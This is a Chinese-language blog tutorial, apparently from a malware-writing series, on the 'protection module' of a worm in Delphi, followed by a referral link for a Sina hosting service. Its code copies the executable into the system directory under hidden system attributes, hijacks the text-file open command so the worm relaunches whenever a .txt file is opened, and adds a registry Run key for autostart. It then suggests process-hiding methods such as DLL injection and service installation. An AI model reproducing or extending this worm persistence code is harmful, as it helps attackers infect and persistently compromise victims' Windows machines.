======================================================
注:本文源代码点此下载
======================================================
一)保护模块。
一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数getsystemdirectory :
uint getsystemdirectory(
lptstr lpbuffer, // 存放返回的字符串的缓冲区
uint usize // 上面的缓冲去的长度
);
相关的函数还有getwindowsdirectory可以得到%windows%的路径
得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :
bool copyfile(
lpctstr lpexistingfilename, // 源文件的路径
lpctstr lpnewfilename, // 目标文件的路径
bool bfailifexists // 这是一个标志,如果目标文件已经存在,是否强制覆盖
);
拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,除非选取查看所有文件,以及显示受保护文件。 同样,介绍一个函数setfileattributes :
bool setfileattributes(
lpctstr lpfilename, // 需要设置的文件的文件名
dword dwfileattributes // 设置的值。
);
我们这里要设置为隐藏和系统,那么就为第二个参数传递file_attribute_hidden+file_attribute_system
下面就是最重要的,让该文件开机自动运行,我们一般都是写注册表,首先用regopenkey函数来打开一个键。
long regopenkey(
hkey hkey, // 主键,比如hkey_local_machine
lpctstr lpsubkey, // 跟随的subkey
phkey phkresult // 存放函数返回这个打开的键的句柄
);
得到了hkey后,就可以用regsetvalueex来向该键写具体的值了。
long regsetvalueex(
hkey hkey, // 这个就是刚才我们得到的句柄
lpctstr lpvaluename, // 键名的地址
dword reserved, // 一般设置为0
dword dwtype, // 我们写的键的类型,字符串为reg_sz
const byte *lpdata, // 键值的地址
dword cbdata // 写入的键值的长度
);
下面,我综合上面的说明来给出一个简短的例子:
procedure selfcopy;
var
path,value:array [0..255] of char;
hk:hkey;
s:string;
begin
getsystemdirectory(path,256);
//取得系统的路径
s:=strpas(path);
//转换成字符串
copyfile(pchar(paramstr(0)),pchar(s+‘/ruin.exe‘),false);
copyfile(pchar(paramstr(0)),pchar(s+‘/virus_ruin.exe‘),false);
//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe
setfileattributes(pchar(s+‘/ruin.exe‘),file_attribute_hidden+file_attribute_system);
setfileattributes(pchar(s+‘/virus_ruin.exe‘),file_attribute_hidden+file_attribute_system);
//设置刚才的两个文件为系统和隐藏
regopenkey(hkey_classes_root,‘txtfile/shell/open/command‘,hk);
value:=‘virus_ruin.exe %1‘;
regsetvalueex(hk,‘‘,0,reg_sz,@value,17);
//把virus_ruin.exe和文本文件关联
regopenkey(hkey_local_machine,‘software/microsoft/windows/currentversion/run‘,hk);
value:=‘ruin.exe‘;
regsetvalueex(hk,‘ruin‘,0,reg_sz,@value,8);
//设置开机自动运行ruin.exe
end;
我们看上面的这个程序,就完成了自我复制,和开机自动运行,并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。
不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,并且进行自我保护。
如:
begin
if paramcount=1 then
shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal);
//其他的代码
这里,我只是给出一个简单的例子来描述出一个大概的思路,很多地方还不完善,比如进程的隐藏,你可以进行判断,如果是98你可以registerserverapplication如果你是用的2000,你可以做为服务启动,或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini。
======================================================
在最后,我邀请大家参加新浪APP,就是新浪免费送大家的一个空间,支持PHP+MySql,免费二级域名,免费域名绑定 这个是我邀请的地址,您通过这个链接注册即为我的好友,并获赠云豆500个,价值5元哦!短网址是http://t.cn/SXOiLh我创建的小站每天访客已经达到2000+了,每天挂广告赚50+元哦,呵呵,饭钱不愁了,\(^o^)/